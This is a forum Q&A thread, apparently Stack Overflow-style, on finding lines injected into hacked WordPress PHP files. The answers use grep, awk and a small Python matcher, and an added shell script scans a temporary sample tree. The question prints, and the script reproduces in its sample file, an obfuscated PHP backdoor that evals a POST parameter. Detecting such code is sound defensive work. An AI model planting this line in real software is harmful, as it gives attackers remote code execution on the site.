Reputation: 441
grep is an excellent utility, but when it comes to this particular task, I don't find any Linux command that comes in handy.
On my server, lots of hacked files are injected, mainly on all the WordPress websites. The pattern is typically like this:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}'q5dfb07'])) { eval(${$s20}['q5dfb07']); }
Now, I am looking for a Linux command which can find the following strings in a single line: isset, eval, [0], [1], [2], [3]. These strings can come in any order.
I think, using we can do it like, grep eval $name | grep strto | grep isset
Upvotes: 1
Views: 653
Reputation: 1551
Based on the information given here: http://www.thegeekstuff.com/2011/10/grep-or-and-not-operators/
If the order is important, use this command:
grep -E 'pattern1.*pattern2' filename
If order doesn't matter, you'll need to format it like this:
grep -E 'pattern1.*pattern2|pattern2.*pattern1' filename
As you could imagine, this could get pretty ugly. I think the most easily readable one is what you suggest:
grep -E 'pattern1' filename | grep -E 'pattern2'
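However, a simple Python program could help you:
#!/usr/bin/env python
from sys import argv

# Every argument except the last is a search key; the last is the file to scan.
keys = argv[1:-1]
with open(argv[-1], 'r') as fd:
    for line in fd:
        # A line matches only if every key occurs in it, in any order.
        matched = True
        for key in keys:
            if key not in line:
                matched = False
                break
        if matched:
            print(line)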
You can run this like:
python search.py pattern1 pattern2 pattern3 filename
Upvotes: 0
Reputation: 785186
You can try this grep -P:
grep -P '(?=.*?isset)(?=.*?eval)(?=.*?\[\d+\])' file.php
Or if you don't have grep then you can use awk:
awk '/isset/ && /eval/ && /\[[0-9]+\]/' file.php
Upvotes: 2
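Added example, not taken from any of the posts above: the awk "every pattern on one line, any order" test from the last answer, generalized to any number of patterns and run over all *.php files under a directory. The function names and the sample tree are made up for the demo; the suspicious sample line is the one quoted in the question, and restricting the scan to *.php is an assumption.

```shell
#!/bin/sh
# scan_all_of DIR PATTERN...   (hypothetical helper name)
# Print "path:line" for every line of a *.php file under DIR that matches
# all PATTERNs (POSIX EREs), in any order.
scan_all_of() {
    dir=$1; shift
    # Patterns travel one per line in the environment: unlike awk -v,
    # ENVIRON values are not escape-processed, so '\[' reaches the regex intact.
    PATS=$(printf '%s\n' "$@") find "$dir" -type f -name '*.php' -exec awk '
        BEGIN { n = split(ENVIRON["PATS"], pat, "\n") }
        {
            for (i = 1; i <= n; i++)
                if ($0 !~ pat[i]) next      # one miss rules the line out
            print FILENAME ":" FNR
        }' {} +
}

# Constructed sample tree: one file holding the line quoted in the question,
# one benign file that has isset and an index but no eval.
make_sample() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/wp-content/uploads" "$root/wp-includes"
    cat > "$root/wp-content/uploads/cache.php" <<'EOF'
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}'q5dfb07'])) { eval(${$s20}['q5dfb07']); }
EOF
    cat > "$root/wp-includes/clean.php" <<'EOF'
<?php if (isset($_GET['page'])) { $first = $items[0]; }
EOF
    printf '%s\n' "$root"
}

# Demo run: only the uploads/cache.php line is reported.
sample=$(make_sample)
scan_all_of "$sample" 'isset' 'eval' '\[[0-9]+\]'
rm -rf "$sample"
```

A hit is only a lead for manual review: legitimate code can contain all three tokens on one line, and an injected line that drops any one of them will not be reported.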